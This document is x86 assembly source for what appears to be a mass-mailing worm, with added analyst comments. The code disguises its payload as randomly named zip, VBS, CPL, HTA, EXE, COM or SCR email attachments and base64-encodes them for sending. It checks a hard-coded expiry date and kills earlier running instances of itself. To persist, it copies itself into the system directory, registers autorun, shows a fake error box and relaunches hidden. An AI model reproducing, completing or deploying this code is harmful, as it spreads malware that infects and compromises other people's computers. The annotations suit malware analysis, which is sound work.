LOCAL lpDestFileName, lpSrcFileName, lpOrigFileName, lpTextFileName, lpTextFileName2: DWORD
LOCAL buf2[30]: BYTE
LOCAL buf[30]: BYTE
invoke GlobalAlloc, GPTR, 8192
mov lpTextFileName, eax
invoke GlobalAlloc, GPTR, 8192
mov lpTextFileName2, eax
invoke GetRandomID, eax, 6
invoke GlobalAlloc, GPTR, 8192
mov lpDestFileName, eax
invoke lstrcpy, lpDestFileName, offset szSysDirFileName
invoke StrDup, lpDestFileName
mov lpOrigFileName, eax
invoke lstrcat, lpDestFileName, offset szTextOpen
invoke StrDup, lpDestFileName
mov lpSrcFileName, eax
invoke lstrcat, lpDestFileName, offset szTextOpen
invoke lstrcpy, lpTextFileName, lpDestFileName
invoke lstrcat, lpTextFileName, offset szTextOpen
invoke lstrcat, lpTextFileName, offset szTextOpen
invoke SetFileAttributes, lpSrcFileName, FILE_ATTRIBUTE_NORMAL
invoke SetFileAttributes, lpTextFileName, FILE_ATTRIBUTE_NORMAL
invoke SetFileAttributes, lpDestFileName, FILE_ATTRIBUTE_NORMAL
invoke CopyFile, lpOrigFileName, lpSrcFileName, FALSE
; Zero set password
invoke ZeroMemory, offset szZipPassBuff, 100
; Remove junk bytes
invoke TruncSrcFile, lpSrcFileName
; Random bytes in .xxx file
invoke ZeroMemory, addr buf2, 30
invoke Rand, 5
add eax, 5
invoke GetRandomID, addr buf2, eax
invoke EmailRandomExt
invoke lstrcat, addr buf2, eax
; Choose random .exe name for zip attach
invoke ZeroMemory, addr buf, 30
invoke Rand, 5
add eax, 5
invoke GetRandomID, addr buf, eax
invoke lstrcat, addr buf, offset szExeExe
invoke Rand, 100
.IF eax >= 50
; 50% zip, vbs, cpl, hta
invoke Rand, 100
.IF eax >= 80
; 20% zip
; Create junk file
invoke CreateFile, lpTextFileName, GENERIC_WRITE or GENERIC_READ, FILE_SHARE_READ or FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, 0, NULL
mov hFile2, eax
invoke lstrlen, lpTextFileName2
xchg eax, edx
invoke WriteFile, hFile2, lpTextFileName2, edx, addr dwWritten, NULL
invoke CloseHandle, hFile2
; Gen password
invoke GetRandomNumID, offset szZipPassBuff, 5
invoke EncodePass, offset szZipPassBuff
mov szAttachExt, offset szExeZip
invoke CreateZipFile, lpSrcFileName, lpTextFileName, lpDestFileName, addr buf, addr buf2, offset szZipPassBuff
.ELSEIF eax >= 50
; 30% vbs
mov szAttachExt, offset szExeVbs
invoke CreateVBSFile, lpSrcFileName, lpDestFileName
.ELSEIF eax >= 20
; 30% cpl
mov szAttachExt, offset szExeCpl
invoke CreateCPLFile, lpSrcFileName, lpDestFileName
.ELSE
; 20% hta
mov szAttachExt, offset szExeHta
invoke CreateHTAFile, lpSrcFileName, lpDestFileName
.ENDIF
.ELSE
; 50% plain
invoke Rand, 100
.IF eax >= 80
; 20% exe
mov szAttachExt, offset szExeExe
.ELSEIF eax >= 40
; 40% com
mov szAttachExt, offset szExeCom
.ELSE
; 40% scr
mov szAttachExt, offset szExeScr
.ENDIF
invoke SetFileAttributes, lpDestFileName, FILE_ATTRIBUTE_NORMAL
invoke CopyFile, lpSrcFileName, lpDestFileName, FALSE
.ENDIF
test eax, eax
jz @file_open_error
invoke FileToBase64, lpDestFileName, offset b64Attach, offset b64AttachLen
@file_open_error:
invoke GlobalFree, lpDestFileName
invoke LocalFree, lpSrcFileName
invoke LocalFree, lpOrigFileName
invoke GlobalFree, lpTextFileName
invoke GlobalFree, lpTextFileName2
IFNDEF DisableInfect
invoke LoadWorkFile, offset szSysDirFileName
ENDIF
ret
EncodeSelf endp
IsShouldRun proc
; BOOL IsShouldRun(void) -- stdcall, no arguments.
; Expiry check: compares the current local time against a fixed cut-off date
; built from the assemble-time constants WorkUntilYear / WorkUntilMonth /
; WorkUntilDay (defined outside this view).
; Out:  eax = 0 when the current time is already later than the cut-off,
;       eax = 1 otherwise.
; ecx/edx are not preserved across the Win32 calls below.
LOCAL SysTime: SYSTEMTIME
LOCAL UntilTime: SYSTEMTIME
LOCAL FilTime: FILETIME
LOCAL UntilFil: FILETIME
invoke GetLocalTime, addr SysTime
; Only the date fields of UntilTime are filled in; everything else stays zero,
; so the cut-off is the very start of that day.
invoke ZeroMemory, addr UntilTime, sizeof SYSTEMTIME
mov UntilTime.wYear, WorkUntilYear
mov UntilTime.wMonth, WorkUntilMonth
mov UntilTime.wDay, WorkUntilDay
; Convert both to FILETIME so they can be compared as 64-bit values.
invoke SystemTimeToFileTime, addr SysTime, addr FilTime
invoke SystemTimeToFileTime, addr UntilTime, addr UntilFil
; CompareFileTime returns 1 when the first time is later than the second,
; i.e. the cut-off date has already passed.
invoke CompareFileTime, addr FilTime, addr UntilFil
.IF eax == 1
xor eax, eax                            ; past cut-off -> 0
.ELSE
xor eax, eax
inc eax                                 ; before cut-off -> 1
.ENDIF
ret
IsShouldRun endp
; Terminate the previous instance if it is running
KillPrevInst proc uses esi ebx
; void KillPrevInst(void) -- stdcall, no arguments; esi/ebx saved by `uses`.
; Walks the Toolhelp32 process snapshot and calls KillProcess (defined
; elsewhere in the project) on every process whose image name contains
; szBglRealName (minus its first character, see below), skipping the
; calling process itself.
; Registers: esi = own process id, ebx = pointer to szBglRealName + 1.
; Out:  eax = 0 always.
; Analyst note: the observable pattern is CreateToolhelp32Snapshot /
; Process32First / Process32Next followed by termination of matching names.
LOCAL Process: PROCESSENTRY32
LOCAL hSnapshot: DWORD
invoke GetCurrentProcessId
mov esi, eax                            ; esi = own PID, never killed
mov ebx, offset szBglRealName
inc ebx                                 ; skip the first character of szBglRealName -- presumably a leading path separator; confirm against its definition
mov Process.dwSize, sizeof PROCESSENTRY32 ; must be set before Process32First
invoke CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS, 0
mov hSnapshot, eax                      ; NOTE(review): INVALID_HANDLE_VALUE is not checked; Process32First then fails and the loop is skipped
invoke Process32First, hSnapshot, addr Process
@l:
.IF eax                                 ; loop while the last Process32First/Next succeeded
invoke StrStrI, addr Process.szExeFile, ebx ; case-insensitive substring match on the image name
.IF (eax) && (Process.th32ProcessID != esi)
invoke KillProcess, Process.th32ProcessID
.ENDIF
invoke Process32Next, hSnapshot, addr Process
jmp @l
.ENDIF
invoke CloseHandle, hSnapshot
IFNDEF TESTVERSION
invoke Sleep, 3500                      ; release builds wait 3.5 s, presumably so the killed instance has exited
ENDIF
xor eax, eax
ret
KillPrevInst endp
StartUp proc
; void StartUp(void) -- stdcall, no arguments.
; Installation / start-up logic:
;   1. builds szSysDirFileName = <system directory> + szBglRealName and
;      stores the path of the running image in szRunFileName;
;   2. registers the system-directory copy for autorun (WriteAutoStart,
;      defined elsewhere);
;   3. scans the command line for a "-upd" switch ("-del" too in
;      TESTVERSION builds);
;   4. if the running image is not the system-directory copy, copies itself
;      there, launches the copy hidden via ShellExecute and calls
;      ExitProcess; otherwise returns to the caller.
; Out:  eax is not meaningful on return (only reached in case 4's else path).
; Analyst note: the persistence indicators are the self-copy into the system
; directory, the autorun registration and the SW_HIDE re-launch of the copy.
LOCAL upd: DWORD
mov upd, FALSE                          ; set to TRUE when "-upd" is found
invoke CRC32BuildTable
invoke Randomize
invoke EmailRandInit
; Get loader filename & add it to autorun
invoke GetSystemDirectory, offset szSysDirFileName, MAX_PATH
invoke lstrcat, offset szSysDirFileName, offset szBglRealName ; szBglRealName presumably begins with a path separator; confirm
invoke GetModuleFileName, NULL, offset szRunFileName, MAX_PATH
invoke WriteAutoStart
invoke SetFileAttributes, offset szSysDirFileName, FILE_ATTRIBUTE_NORMAL
invoke GetCommandLine
; Byte-by-byte scan of the command line, starting at offset 1.  MASM packs
; the four-character constant 'dpu-' so that it matches the bytes "-upd" in
; memory (and 'led-' matches "-del").
; NOTE(review): the first compare runs before any terminator check, so a
; command line shorter than five bytes is read past its end.
@check_upd_loop:
cmp dword ptr[eax+1], 'dpu-'
jz @do_update
IFDEF TESTVERSION
cmp dword ptr[eax+1], 'led-'           ; "-del" switch, test builds only
jz @do_del
ENDIF
inc eax
cmp byte ptr[eax+4], 0                  ; stop once the 4-byte window reaches the terminator
jnz @check_upd_loop
jmp @do_not_update
IFDEF TESTVERSION
@do_del:
invoke KillPrevInst
invoke DoSelfDelete                     ; falls through into @do_update if DoSelfDelete returns
ENDIF
@do_update:
mov upd, TRUE
invoke KillPrevInst                     ; stop the already-installed instance before replacing it
@do_not_update:
; Check if running from system folder
invoke lstrcmpi, offset szRunFileName, offset szSysDirFileName
.IF eax
; Running from unknown folder
; Show error message (suppressed on an update run)
.IF !upd
invoke GetDesktopWindow
invoke MessageBox, eax, offset szShowMessage, offset szShowCaption, MB_ICONERROR
.ENDIF
; Copy file to %system% folder and run
invoke SetFileAttributes, offset szSysDirFileName, FILE_ATTRIBUTE_NORMAL
invoke CopyFile, offset szRunFileName, offset szSysDirFileName, FALSE
.IF eax                                 ; copy succeeded -> launch the copy hidden, using verb szTextOpen
invoke SetFileAttributes, offset szSysDirFileName, FILE_ATTRIBUTE_NORMAL
invoke ShellExecute, 0, offset szTextOpen, offset szSysDirFileName, NULL, NULL, SW_HIDE
.ENDIF
invoke ExitProcess, 0                   ; the original image never continues past here
.ELSE
; Running from system folder, start replication code
.ENDIF
ret
StartUp endp